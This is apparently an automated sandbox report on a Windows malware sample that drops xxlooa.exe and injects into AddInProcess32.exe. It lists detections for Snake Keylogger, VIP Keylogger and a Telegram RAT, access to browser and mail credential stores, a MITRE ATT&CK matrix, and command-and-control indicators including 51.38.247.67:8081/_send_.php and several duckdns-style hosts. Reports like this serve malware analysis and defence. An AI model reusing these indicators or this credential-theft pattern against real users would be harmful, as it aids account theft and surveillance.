Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Queries volume information: C:\Users\user\AppData\Roaming\xxlooa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Queries volume information: C:\Users\user\AppData\Roaming\xxlooa.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 19_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

19_2_00412A15

Source: C:\Users\user\Desktop\File.com.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 19.2.AddInProcess32.exe.285fd6e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7592, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 17.2.AddInProcess32.exe.52f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2b5fd6e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2b60c8e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2941974221.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2962556300.0000000005327000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 6936, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 19.2.AddInProcess32.exe.285fd6e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2962597104.0000000005138000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2944387011.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2943610200.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7592, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 19.2.AddInProcess32.exe.285fd6e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7592, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 17.2.AddInProcess32.exe.52f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2b5fd6e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2b60c8e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2941974221.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2962556300.0000000005327000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 6936, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	211 Process Injection	1 DLL Side-Loading	NTDS	141 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Masquerading	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Valid Accounts	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	11 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	141 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	211 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
File.com.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\xxlooa.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\xxlooa.exe	45%	ReversingLabs	ByteCode-MSIL.Packed.Generic
C:\Users\user\AppData\Roaming\xxlooa.exe	49%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
smtp.zoho.eu	0%	Virustotal	Browse
reallyfreegeoip.org	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://www.office.com/hF	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enx6	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://www.office.com/lB	0%	Avira URL Cloud	safe
